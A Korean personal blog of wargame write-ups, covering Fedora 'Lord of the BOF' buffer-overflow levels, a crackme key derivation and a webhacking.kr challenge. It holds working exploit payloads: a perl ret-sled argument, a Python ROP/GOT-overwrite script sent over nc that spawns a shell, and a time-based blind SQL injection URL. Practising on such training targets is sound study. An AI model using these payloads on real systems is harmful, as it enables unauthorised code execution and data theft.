windowhan lab

서버가 아파치일 경우, 아파치 자체의 기능으로 같은 세션으로 같은 페이지를 부를 때, 한 페이지의 스크립트가 모두 끝나기 전까지는 다른 페이지가 실행되지 않는다.

set *(자료형*)포인터주소 = 값

예시)

(gdb) set *(long*)0xb7fcc104 = 0xb7fcc10c

(gdb) x/x 0xb7fcc104

0xb7fcc104: 0xb7fcc10c

(gdb) 

0xb7fcc108: 0x0804858e

(gdb) 

0xb7fcc10c: 0x00031337

(gdb) 

0xb7fcc110: 0x007db0e7

(gdb) 

FC3은 않그러지만 FC4부터 임시버퍼에 ASLR이 걸려있다고 들었다.

FC4는 숫자가 2개만 랜덤하게 되서 Brute Force하게 공격을하면 쓸 수 있을 것같다.

근데 희안한건 FC13에서는 임시버퍼에 ASLR이 제대로 걸려있지않다.

왜그런지는 잘 모르겠다.

풀려있으면 그냥 써야지.

데이터를 특정한 곳에 갔다놓을때는 뒤에 널문자가 붙는듯.

따라서 ret 다음에 바로 canary가 존재할 경우에는 canary를 침범할 수 있으니 조심해야한다.

(gdb) x/100x $esp

0xbffca220: 0x00000000 0x530e0443 0x00000000 0x530e14b1

0xbffca230: 0x00000000 0x61616161 0x61616161 0x61616161

0xbffca240: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca250: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca260: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca270: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca280: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca290: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2a0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2b0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2c0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2d0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2e0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2f0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca300: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca310: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca320: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca330: 0x61616161 0x62626262 0x63636363 0x0804000a

0xbffca340: 0x00031337 0xbffca368 0x008cb740 0x00000000

0xbffca350: 0x007a3828 0x00040000 0x00000000 0x007a3300

0xbffca360: 0x00000000 0x0079eb64 0x61616161 0x61616161

0xbffca370: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca380: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca390: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca3a0: 0x61616161 0x61616161 0x61616161 0x61616161

(gdb) she (python -c 'print "a"*260 + "bbbb" + "cccc"') > res

(gdb) r < res

The program being debugged has been started already.

Start it from the beginning? (y or n) y

warning: cannot close "shared object read from target memory": File in wrong format

Starting program: /home/cruel/tmp/enigma < res

Reading symbols from shared object read from target memory...(no debugging symbols found)...done.

Loaded system supplied DSO at 0x576000

(no debugging symbols found)

(no debugging symbols found)

enigma : The brothers will be glad to have you!

you : 

Breakpoint 3, 0x08048526 in vuln ()

(gdb) x/100x $esp

0xbf9d9180: 0x00000000 0x530e14b4 0x00000000 0x530e14c1

0xbf9d9190: 0x00000000 0x61616161 0x61616161 0x61616161

0xbf9d91a0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91b0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91c0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91d0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91e0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91f0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9200: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9210: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9220: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9230: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9240: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9250: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9260: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9270: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9280: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9290: 0x61616161 0x61616161 0x62626262 0x63636363

0xbf9d92a0: 0x0003000a 0xbf9d92c8 0x008cb740 0x00000000

0xbf9d92b0: 0x007a3828 0x00040000 0x00000000 0x007a3300

0xbf9d92c0: 0x00000000 0x0079eb64 0x61616161 0x61616161

0xbf9d92d0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d92e0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d92f0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9300: 0x61616161 0x61616161 0x61616161 0x61616161

데이터 + \x0a\x00을 추가하는듯.

문제의 소스입니다.

[dark_stone@Fedora_2ndFloor ~]$ cat cruel.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - cruel
 - Local BOF on Fedora Core 4
 - hint : no more fake ebp, RET sleding on random library
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}

모양은 상당히 단순합니다.

하지만 Fedora Core 3 까지는 인자 참조를 할 때, ebp를 참조하지만 Fedora Core 4부터는 esp를 기준으로 참조를 합니다.

(개인적인 생각으로 ebp가 아닌 esp가 기준이되면 스택이 변동될때마다 esp가 달라져서 힘들것같기도한데... 나중에 공부를 해보다보면 이유를 찾을수 있겠죠 ㅋㅋ)

인자로 삼기위해서는 변하지 않으면서, 고정적인 데이터가 필요합니다.

Data Segment에 위치한 데이터를 심볼릭링크를 걸어서 인자로 삼을 수 있겠네요.

(gdb) x/8x $esp
0xbf92401c: 0x007bad7f 0x00000002 0xbf9240a4 0xbf9240b0
0xbf92402c: 0xbf924060 0x00795898 0x007a3878 0xb7f26690
(gdb)
0xbf92403c: 0x00000001 0x008caff4 0x007a2ca0 0x08048454
0xbf92404c: 0xbf924078 0xbf924020 0x007bad44 0x00000000

ret은 pop %eip를 해줌으로써, pop 명령어가 가진 특성으로 인해 esp가 4씩 증가한다는 특징이 있습니다.

대략 ret을 9번쯤하면 esp+4위치에 0x08048454에 위치한 데이터들이 인자로 들어가겠네요.

[dark_stone@Fedora_2ndFloor tmp]$ xxd err | grep cve -A 2
0000000: 6578 6563 7665 2822 2e2f 6372 7565 6c22  execve("./cruel"
0000010: 2c20 5b22 2e2f 6372 7565 6c22 2c20 2261  , ["./cruel", "a
0000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
--
0000680: 3330 300a 6578 6563 7665 2822 5589 e557  300.execve("U..W
0000690: 5653 83ec 0ce8 222c 205b 2222 2c20 2251  VS....", ["", "Q
00006a0: 5c32 3034 5c34 5c31 3051 5c32 3034 5c34  \204\4\10Q\204\4

[dark_stone@Fedora_2ndFloor ~]$ gcc -o `perl -e 'print "\x55\x89\xe5\x57\x56\x53\x83\xec\x0c\xe8"'` ./tmp/shell.c

[dark_stone@Fedora_2ndFloor ~]$ ./cruel `perl -e 'print "a"x260,"\x51\x84\x04\x08"x9,"\x68\x2d\x83"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQQQQQQQQQh-
sh-3.00$ id
uid=501(cruel) gid=501(cruel) groups=500(dark_stone) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 501
come on, come over
sh-3.00$

BAAASIC GNIREENIGNE
출처: HISCHALL 2013
40점
설명: 히히히
basic50!!.exe

=======================

입력받는 부분의 어셈부터 보도록 하겠다.

.text:00BC1564                 call    INPUUUUUUUUUT

이부분이 입력값을 받는 함수를 호출하는 부분이다.

이 뒤에 루틴부터 설명하도록 하겠다.

.text:00BC156C                 mov     eax, 1
.text:00BC1571                 imul    eax, 5
.text:00BC1574                 movsx   ecx, [ebp+eax+buffer[0]]
.text:00BC1579                 cmp     ecx, 69
.text:00BC157C                 jnz     loc_BC16D2

buffer[0]에서 5만큼 떨어진 거리 (buffer[5])하고 69('E')를 비교하고있다.

loc_BC16D2 이 부분은 살펴보니 wrong이라는 문자열을 포함하고 있었다.

틀리면 호출되는 부분일 것이다. 따라서 저부분을 회피하면서 문자열을 작성 해주면 된다.

현재 BUFFER = ?????E???????????

.text:00BC1582                 mov     eax, 1
.text:00BC1587                 shl     eax, 0
.text:00BC158A                 movsx   ecx, byte ptr [ebp+eax-1Ch]
.text:00BC158F                 xor     ecx, 9
.text:00BC1592                 cmp     ecx, 'p'
.text:00BC1595                 jnz     loc_BC16D0

(헥스레이로 훑어본 결과 shl부분은 별 의미가 없는듯 싶다.)

이번에는 buffer[1]에 x^9 = p 라는 식이 보인다.

112 ^ 9 = y 이므로 input[1] = y

현재 BUFFER = ?y???E??????

.text:00BC159B                 mov     eax, 1
.text:00BC15A0                 imul    eax, 15
.text:00BC15A3                 movsx   ecx, byte ptr [ebp+eax-1Ch]
.text:00BC15A8                 sub     ecx, 10
.text:00BC15AB                 cmp     ecx, 87

어셈으로 봤을 때, 15보다 큰 숫자가 없으므로 문자열의 길이는 총 16글자일 것이다.

buffer[15]를 87 + 10(a)와 비교하고 있다

현재 BUFFER = ?y???E?????????a

buffer[6] ~ buffer[15] 를 paktdlTdm이라는 문자열과 비교해주고있습니다.

현재 BUFFER = ?y???EpaktdlTdma

mov     eax, 1
.text:00BC1665                 imul    eax, 0
.text:00BC1668                 movsx   ecx, [ebp+eax+buffer[0]]
.text:00BC166D                 cmp     ecx, 'd'

buffer[0]을 d랑 비교해주고 있습니다.

현재 BUFFER = dy???EpaktdlTdma

mov     eax, 1
.text:00BC1677                 shl     eax, 1
.text:00BC1679                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC167D                 mov     byte ptr [ebp+var_48], cl
.text:00BC1680                 mov     eax, 1
.text:00BC1685                 imul    eax, 3
.text:00BC1688                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC168C                 mov     byte ptr [ebp+var_48+1], cl
.text:00BC168F                 mov     eax, 1
.text:00BC1694                 shl     eax, 2
.text:00BC1697                 mov     cl, [ebp+eax+buffer[0]]
.text:00BC169B                 mov     [ebp+var_46], cl
.text:00BC169E                 xor     eax, eax
.text:00BC16A0                 mov     [ebp+var_45], ax
.text:00BC16A4                 push    offset aAka     ; "aka"
.text:00BC16A9                 lea     eax, [ebp+var_48]
.text:00BC16AC                 push    eax             ; Str1

buffer[1] ~ buffer[3] 까지 aka라는 문자열과 비교해주고있구요.

현재 BUFFER = dyakaEpaktdlTdma

평소에는 난독증이 있어서 어셈을 잘 보지못했었는데 헥스레이랑 같이 보니까 재밌기도하고 답이나오네요 ㅎ

너무 헥스레이를 믿어서는 않될것같습니다.

힌트로 제시해준 소스이다.

=============================================================================

=============================================================================

http://webhacking.kr/challenge/web/web-34/index.php?msg=sadf&se=if(ascii(substr(pw,0,1))>0,sleep(100),1)

이런식으로 se에는 '(싱글 쿼터)로 묶여있지 않으므로 if문을 이용해서 timebased blind sql injection을 시도하면 풀린다.

sleep의 인자로 너무 큰 숫자를 주면 서버에 무리가 가니까 적당한 숫자를 인자로 주자.

guest@notroot-virtual-machine:~$ ulimit -s unlimited
guest@notroot-virtual-machine:~$ cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 393239     /bin/cat
08053000-08054000 r--p 0000a000 08:01 393239     /bin/cat
08054000-08055000 rw-p 0000b000 08:01 393239     /bin/cat
0a01a000-0a03b000 rw-p 00000000 00:00 0          [heap]
40000000-40020000 r-xp 00000000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40020000-40021000 r--p 0001f000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40021000-40022000 rw-p 00020000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40022000-40023000 r-xp 00000000 00:00 0          [vdso]
40023000-40025000 rw-p 00000000 00:00 0
40025000-40026000 r--p 00855000 08:01 2236817    /usr/lib/locale/locale-archive
40038000-401e6000 r-xp 00000000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e6000-401e8000 r--p 001ae000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e8000-401e9000 rw-p 001b0000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e9000-401ed000 rw-p 00000000 00:00 0
401ed000-403ed000 r--p 00000000 08:01 2236817    /usr/lib/locale/locale-archive
403ed000-4051f000 r--p 00858000 08:01 2236817    /usr/lib/locale/locale-archive
bfacf000-bfaf0000 rw-p 00000000 00:00 0          [stack]
guest@notroot-virtual-machine:~$ cat /proc/self/maps
08048000-08053000 r-xp 00000000 08:01 393239     /bin/cat
08053000-08054000 r--p 0000a000 08:01 393239     /bin/cat
08054000-08055000 rw-p 0000b000 08:01 393239     /bin/cat
0904d000-0906e000 rw-p 00000000 00:00 0          [heap]
40000000-40020000 r-xp 00000000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40020000-40021000 r--p 0001f000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40021000-40022000 rw-p 00020000 08:01 1704861    /lib/i386-linux-gnu/ld-2.17.so
40022000-40023000 r-xp 00000000 00:00 0          [vdso]
40023000-40025000 rw-p 00000000 00:00 0
40025000-40026000 r--p 00855000 08:01 2236817    /usr/lib/locale/locale-archive
40038000-401e6000 r-xp 00000000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e6000-401e8000 r--p 001ae000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e8000-401e9000 rw-p 001b0000 08:01 1704885    /lib/i386-linux-gnu/libc-2.17.so
401e9000-401ed000 rw-p 00000000 00:00 0
401ed000-403ed000 r--p 00000000 08:01 2236817    /usr/lib/locale/locale-archive
403ed000-4051f000 r--p 00858000 08:01 2236817    /usr/lib/locale/locale-archive
bfafc000-bfb1d000 rw-p 00000000 00:00 0          [stack]

문제의 소스입니다.

[evil_wizard@Fedora_1stFloor tmp]$ cat ../dark_stone.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - dark_stone
 - Remote BOF on Fedora Core 3
 - hint : GOT overwriting again
 - port : TCP 8888
*/

#include <stdio.h>

// magic potion for you
void pop_pop_ret(void)
{
 asm("pop %eax");
 asm("pop %eax");
 asm("ret");
}
 
int main()
{
 char buffer[256];
 char saved_sfp[4];
 int length;
 char temp[1024];

 printf("dark_stone : how fresh meat you are!\n");
 printf("you : ");
 fflush(stdout);

 // give me a food
 fgets(temp, 1024, stdin);

 // for disturbance RET sleding
 length = strlen(temp);
  
 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, temp);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

 // buffer cleaning
 memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);

 printf("%s\n", buffer);
}

저번 문제와 똑같은 문제지만 저번 문제와 이번문제의 차이는 저번 문제는 local 환경이었고, 이번 문제는 remote환경 이라는 것입니다.

문제 - 4 : http://windowhan.tistory.com/entry/hellfire-evilwizard (저번 문제와 똑같이 풀었습니다.)

제가 쓴 소스입니다.

[evil_wizard@Fedora_1stFloor tmp]$ cat ex.py
#!/usr/bin/python
from struct import pack
import os

printf_plt = 0x08048408
printf_got = 0x0804984c
strcpy_plt = 0x08048438

garget1 = 0x08048484 #0xc0
garget2 = 0x0804838c #0x07
garget3 = 0x080482b4 #0x75
garget4 = 0x0804982c #0x00

b_garget1 = 0x0804872d #h
b_garget2 = 0x08048287 #s
b_garget3 = 0x08048114 #/
b_garget4 = 0x08048720 #n
b_garget5 = 0x0804811d #i
b_garget6 = 0x08048117 #b
b_garget7 = 0x08048114 #/
b_garget8 = 0x0804982c #\x00

func_stack = 0x08049874 #system function address
binsh_stack = 0x8049980 #/bin/sh address
final_binsh_stack = 0x08049ad0
ppr = 0x080484f3 #pop;pop;ret
binsh = 0x00833603 #"/bin/sh"

p = lambda x : pack("<L",x)

payload = ""
payload += "\x90"*268
payload += p(strcpy_plt) + p(ppr) + p(func_stack+0) + p(garget1)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+1) + p(garget2)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+2) + p(garget3)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+3) + p(garget4)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+4) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+5) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+6) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+7) + p(b_garget8)
payload += p(strcpy_plt) + p(ppr) + p(printf_got) + p(func_stack)

payload += p(printf_plt) + "\x90"*4 + p(binsh)

print payload

=========================================================================

[evil_wizard@Fedora_1stFloor tmp]$ (python ex.py;cat)|nc localhost 8888
dark_stone : how fresh meat you are!
you :
id
uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t
my-ps^Hass
/bin/sh: line 3: my-pass: command not found
my-pass
euid = 505
let there be light

==========================================================================

[dark_stone@Fedora_1stFloor ~]$ ls
dropped_item.txt
[dark_stone@Fedora_1stFloor ~]$ cat dropped_item.txt
                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,'
                   `'

==================================================================

07을 찾아야했는데 00을 찾아서 넣어주고 있었네요...

원래 system 함수의 주소는 0x7507c0 인데 0x7500c0으로 넣어서 엉뚱한곳을 실행시키고있었다는..하하..-_-;;

보스몹이 쥐고있던 아이템을 획득했습니다 ㅋㅋ

그래야 최소한의 공부는 하지..